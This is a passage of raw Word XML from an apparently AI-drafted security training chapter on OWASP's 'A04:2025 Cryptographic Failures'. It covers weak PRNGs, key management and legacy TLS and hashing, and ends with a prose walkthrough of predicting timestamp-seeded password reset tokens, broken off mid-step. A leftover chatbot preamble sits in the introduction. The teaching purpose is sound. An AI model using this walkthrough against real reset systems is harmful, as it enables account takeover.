    <w:p w14:paraId="476BAAC8" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="08838810" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Chapter 5:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39077347" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>A04:2025 Cryptographic Failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDE3DBC" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F3586D"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 xml:space="preserve">Here are the introduction paragraphs for </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>A04:2025 Cryptographic Failures</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , formatted to match a professional, comprehensive security standard:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F93FC47"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A04:2025 – Cryptographic Failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B420FDB" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Background</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506709DE"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 xml:space="preserve">Moving down two positions to the #4 spot in the latest OWASP Top 10, </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Cryptographic Failures</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> remains one of the most pervasive and impactful systemic risks to modern software architectures. Previously categorized under various headings like "Sensitive Data Exposure," this vulnerability focus has sharpened to address the root cause rather than the symptom: the systemic failure to implement robust encryption, secure cryptographic algorithms, and strict key management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF2642A"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Data from extensive application security testing reveals a persistent reliance on flawed implementations. A significant driver of this risk profile includes the misuse of weak pseudorandom number generators (PRNGs), which undermines the core predictability safeguards of cryptographic systems. This vulnerability category specifically maps to critical industry blind spots, including:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF962EB" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="98"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>CWE-327:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use of a Broken or Risky Cryptographic Algorithm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4654AC09" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="98"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>CWE-331:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Insufficient Entropy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3958A6DE" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="98"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>CWE-338:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19066512" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="98"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>CWE-1241:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use of Predictable Algorithm in Random Number Generator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256035E3" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>High-Level Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770010D7"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At its core, a Cryptographic Failure occurs when an application fails to adequately protect data in transit and at rest, or relies on cryptographic functions that can be easily bypassed, downgraded, or cracked. In the modern cloud ecosystem, traditional excuses—such as severe CPU performance degradation or complex manual certificate management—are no longer valid. Modern hardware handles cryptographic acceleration (like native AES instructions) seamlessly, and automated services have drastically simplified transport layer security (TLS) implementation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5892FDF7"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lastRenderedPageBreak/>
        <w:t>However, the threat vector has shifted heavily toward application-layer complexities. Organizations frequently fail to identify what constitutes sensitive data—ranging from credentials and credit card numbers to health records protected under strict legal frameworks like GDPR and PCI DSS. When this sensitive data relies on default keys, hardcoded credentials in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A25E24C"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source code repositories, obsolete hashing functions (like MD5 or SHA1), or predictable initialization vectors, the entire security perimeter collapses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6730DC" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Potential Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CA4B0E"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The fallout from cryptographic failures is almost always severe, carrying catastrophic financial, legal, and reputational consequences. When data in transit lacks enforced TLS or falls victim to protocol downgrades, attackers can intercept session cookies, hijack authenticated users, or even alter critical in-flight transaction data. At rest, poorly hashed or unencrypted databases allow attackers who gain unauthorized file access to instantly extract sensitive data at scale using precalculated rainbow tables or GPU-accelerated brute-force attacks. Ultimately, failing to properly implement cryptography turns a single application breach into a total data compromise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22AE177A" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Core Concept &amp; Mechanics (What &amp; How)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC7706D" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>1. Definition: What is the technical definition of this vulnerability according to OWASP?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D30B58C"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 xml:space="preserve">According to OWASP, </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>A04:2025 – Cryptographic Failures</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a root-cause vulnerability category that occurs when an application fails to protect sensitive data in transit and at rest, or implements cryptography in a flawed, weak, or easily bypassed manner. Rather than focusing merely on the symptom (sensitive data exposure), this definition targets the systemic lack of cryptography, the use of insufficiently strong or broken cryptographic algorithms, the improper generation and leaking of cryptographic keys, and the failure to use cryptographically secure randomness.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B1C5A7" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>2. The "Why": What architectural flaw, misconfiguration, or coding mistake typically causes this vulnerability to exist?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF87301"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Cryptographic failures rarely stem from a flaw in the mathematics of cryptography itself; instead, they are caused by implementation errors, architectural oversights, and configuration mistakes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C60D750" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="99"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Failure to Classify Data:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> An architectural omission where data is not mapped or classified, leading developers to leave sensitive data (PII, health records, credentials) unencrypted at rest or exposed in application logs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A30EBC3" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="99"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Poor Key Management:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Hardcoding cryptographic keys or salts into source code repositories, using default keys, or failing to implement a secure automated key rotation mechanism.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D14731" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="99"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Misconfigured Transport Layer Security:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Relying on outdated TLS protocols (e.g., TLS 1.0 or 1.1), failing to enforce HTTP Strict Transport Security (HSTS), or supporting weak, legacy cipher suites (like Cipher Block Chaining mode).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A51B36" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="00E747AE" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="99"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Insecure Pseudo-Random Number Generators (PRNGs):</w:t>
      </w:r>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Using standard language utilities (like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>java.util.Random</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>Math.random</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ) for security-sensitive operations like session token generation or password resets instead of Cryptographically Secure PRNGs (CSPRNGs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D11BC7C" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="100"/>
        </w:numPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Legacy Cryptographic Primitives:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Using broken, fast, or deprecated algorithms such as MD5 or SHA1 for password hashing, which allows attackers to rapidly reverse hashes using commodity GPU hardware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C78C107" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>3. The Mechanics: Walk through a step-by-step scenario: How does an attacker actually exploit this?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F921D88"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Scenario: Insecure Randomness in Password Reset Tokens</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5383CB23"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An application uses a weak, predictable pseudo-random number generator (PRNG) based on the system timestamp to generate password reset tokens.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0214EABD"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Step-by-Step Exploitation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777E1326" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="101"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Reconnaissance &amp; Baseline:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> The attacker requests a password reset token for an account they control at a precisely recorded time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB18561" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="101"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Analyzing the Pattern:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> The system processes the request, takes the current system time in milliseconds, and feeds it as a seed to a standard PRNG to generate a hexadecimal token string.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4756AC49" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="101"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Targeting the Victim:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> The attacker triggers a password reset request for the victim's account ( </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>admin@targetcompany.com</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ) and logs the exact network response time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631C4263" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="00E747AE" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="101"/>
        </w:numPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>System Processing &amp; Compromise:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
